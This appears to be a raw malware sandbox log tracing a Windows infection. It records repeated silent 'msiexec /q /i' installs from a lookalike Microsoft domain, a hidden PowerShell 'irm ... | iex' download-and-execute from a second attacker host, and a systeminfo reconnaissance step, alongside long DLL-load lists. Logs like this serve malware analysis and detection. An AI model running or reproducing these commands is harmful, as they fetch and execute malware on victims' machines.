Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=3264,i,11090072880951647910,17287777256714508569,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=3492 /prefetch:3 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=3264,i,11090072880951647910,17287777256714508569,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=4812 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding EF716064682E1076D0BADB4927A14935 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$s='irm events-data-microsoft.live/h8xiyPNTne';iex ([string]::Join('|', $s, 'iex'))" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\system32\systeminfo.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: tsappcmp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: msi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: tsappcmp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: tsappcmp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: scrrun.dll Jump to behavior
